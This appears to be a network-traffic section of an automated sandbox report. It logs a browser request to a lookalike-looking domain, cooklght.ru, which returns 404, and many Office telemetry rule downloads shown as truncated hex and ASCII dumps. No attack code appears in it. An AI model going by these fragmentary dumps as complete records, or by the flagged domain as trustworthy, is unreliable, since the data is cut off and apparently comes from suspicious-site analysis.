                                                                            2024-10-28 08:37:09 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            79192.168.2.449851104.21.91.1454431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:09 UTC579OUTGET /favicon.ico HTTP/1.1
                                                                            Host: cooklght.ru
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://cooklght.ru//
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:37:10 UTC840INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 28 Oct 2024 08:37:10 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cache-control: private, no-cache, max-age=0
                                                                            pragma: no-cache
                                                                            vary: Accept-Encoding
                                                                            CF-Cache-Status: BYPASS
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wU86ZkLChHGwsGXE7iVMwUH4zwTrzKODgoeTBUCkRFC%2FN77LdGcTyfToJ3FFEFE08SIJJZd%2FULcl%2BAFOXmP3cxNffWx5xEW2eVvOkQofnLEj8cyoSShA5Bm799Ml%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d999a30ead9466c-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1045&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1157&delivery_rate=2661764&cwnd=250&unsent_bytes=0&cid=66bfbf0fe0f71cbf&ts=494&x=0"
                                                                            2024-10-28 08:37:10 UTC529INData Raw: 34 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                                                                            Data Ascii: 4e1<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                                                                            2024-10-28 08:37:10 UTC727INData Raw: 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e
                                                                            Data Ascii: top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div>
                                                                            2024-10-28 08:37:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            80192.168.2.44985613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:10 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:10 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:10 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 416
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                            ETag: "0x8DC582BAEA4B445"
                                                                            x-ms-request-id: 809859d7-601e-00ab-6828-2666f4000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083710Z-17c5cb586f626sn8grcgm1gf80000000037000000000665s
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:10 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            81192.168.2.44985513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:10 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:10 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:10 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 491
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                            ETag: "0x8DC582B98B88612"
                                                                            x-ms-request-id: 39d89106-201e-003f-20a3-266d94000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083710Z-16849878b78smng4k6nq15r6s4000000066000000000eskg
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:10 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            82192.168.2.44985413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:10 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:10 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:10 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 448
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                            ETag: "0x8DC582BB389F49B"
                                                                            x-ms-request-id: 51ccb76b-001e-0049-0a37-265bd5000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083710Z-15b8d89586f42m673h1quuee4s00000008t00000000086nk
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:10 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            83192.168.2.44985313.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:10 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:11 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:11 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 475
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                            x-ms-request-id: c417f1b6-b01e-0084-279b-27d736000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083711Z-15b8d89586fsx9lfqmgrbzpgmg0000000nh0000000007f34
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:11 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            84192.168.2.44985213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:10 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:11 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:11 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 425
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                            ETag: "0x8DC582BBA25094F"
                                                                            x-ms-request-id: 168e2c35-b01e-00ab-10df-25dafd000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083711Z-15b8d89586ff5l62aha9080wv0000000060g000000006n97
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:11 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            85192.168.2.44985913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:11 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:11 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:11 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 415
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                            ETag: "0x8DC582BA80D96A1"
                                                                            x-ms-request-id: 3802ff33-701e-0001-4310-28b110000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083711Z-r197bdfb6b4jlq9hb8xf0re6t400000004s00000000078r0
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:11 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            86192.168.2.44985813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:11 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:11 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:11 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 479
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                            ETag: "0x8DC582B989EE75B"
                                                                            x-ms-request-id: 76dad30c-801e-0083-5fe5-27f0ae000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083711Z-17c5cb586f6fqqst87nqkbsx1c00000003700000000037yg
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:11 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            87192.168.2.44986013.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:11 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:11 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:11 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 471
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                            x-ms-request-id: 9e4d4e08-401e-0047-1d64-278597000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083711Z-16849878b78bjkl8dpep89pbgg00000003h00000000049y0
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:11 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            88192.168.2.44986213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:11 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:12 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:11 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 477
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                            ETag: "0x8DC582BA54DCC28"
                                                                            x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083711Z-16849878b78z2wx67pvzz63kdg000000039g00000000du9p
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
